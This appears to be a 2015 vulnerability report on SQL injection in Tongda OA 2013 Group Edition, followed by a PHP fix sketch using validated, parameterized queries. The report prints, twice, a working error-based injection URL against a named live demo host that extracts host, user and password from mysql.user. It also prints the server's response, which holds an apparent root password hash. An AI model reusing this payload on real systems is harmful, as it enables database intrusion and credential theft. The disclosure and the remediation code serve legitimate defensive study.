SQL Injection in Tongda OA 2013 Group Edition

2015-04-09T00:00:00
ID SSV:96105
Type seebug
Reporter Root
Modified 2015-04-09T00:00:00

Description

Brief description:

Tongda

Detailed description:

Official demo login: http://www.day900.com/ cw
Having to log in makes this a bit underwhelming.

Injection point + payload:

http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015

Response:

请联系管理员
错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_year_depts.php

Proof of vulnerability:

Injection point + payload:

http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015

Response:

请联系管理员
错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_year_depts.php
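
The echoed statement shows DEPT_IDS being concatenated straight into the `IN (...)` list. The sketch below is an added example, not Tongda's code: it builds the same query shape with a validated integer list and bound parameters. The function names are hypothetical, the table and column names are taken from the echoed statement, and an in-memory SQLite database with constructed rows stands in for MySQL (assumes the pdo_sqlite extension).

```php
<?php
declare(strict_types=1);

// Hypothetical helper: parse a DEPT_IDS-style value into integers, or fail.
function parse_dept_ids(string $raw): array
{
    // Accept only digits separated by commas, e.g. "1" or "1,2,3".
    if (!preg_match('/\A\d{1,9}(,\d{1,9})*\z/', $raw)) {
        throw new InvalidArgumentException('DEPT_IDS must be a comma-separated list of integers');
    }
    return array_map('intval', explode(',', $raw));
}

// Same query shape as the statement echoed in the error page, but every
// request value is bound as a parameter instead of concatenated into SQL.
function count_budget_results(PDO $pdo, string $deptIds, string $year): int
{
    $ids = parse_dept_ids($deptIds);
    if (!preg_match('/\A\d{4}\z/', $year)) {
        throw new InvalidArgumentException('YEAR must be four digits');
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));   // one ? per id
    $stmt = $pdo->prepare(
        "SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT
          WHERE FORMATION_WAY = 'Y' AND DEPT_ID IN ($marks)
            AND ALLOW = '1' AND BUDGET_YEAR = ?"
    );
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->bindValue(count($ids) + 1, $year, PDO::PARAM_STR);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed demo data; SQLite is an assumption standing in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE BUDGET_RESULT (BUDGET_RESULT_ID INTEGER PRIMARY KEY,
    FORMATION_WAY TEXT, DEPT_ID INTEGER, ALLOW TEXT, BUDGET_YEAR TEXT)");
$pdo->exec("INSERT INTO BUDGET_RESULT (FORMATION_WAY, DEPT_ID, ALLOW, BUDGET_YEAR)
    VALUES ('Y', 1, '1', '2015'), ('Y', 2, '1', '2015'), ('Y', 3, '0', '2015')");

// The last input is a constructed, shortened value that closes the IN list.
foreach (['1', '1,2,3', '1) and (select 1)#'] as $input) {
    try {
        printf("%-20s => %d rows\n", $input, count_budget_results($pdo, $input, '2015'));
    } catch (InvalidArgumentException $e) {
        printf("%-20s => rejected: %s\n", $input, $e->getMessage());
    }
}
```

Returning a generic error to the client, rather than the MySQL error text and full statement shown in the response above, removes the channel this report relies on to read data back.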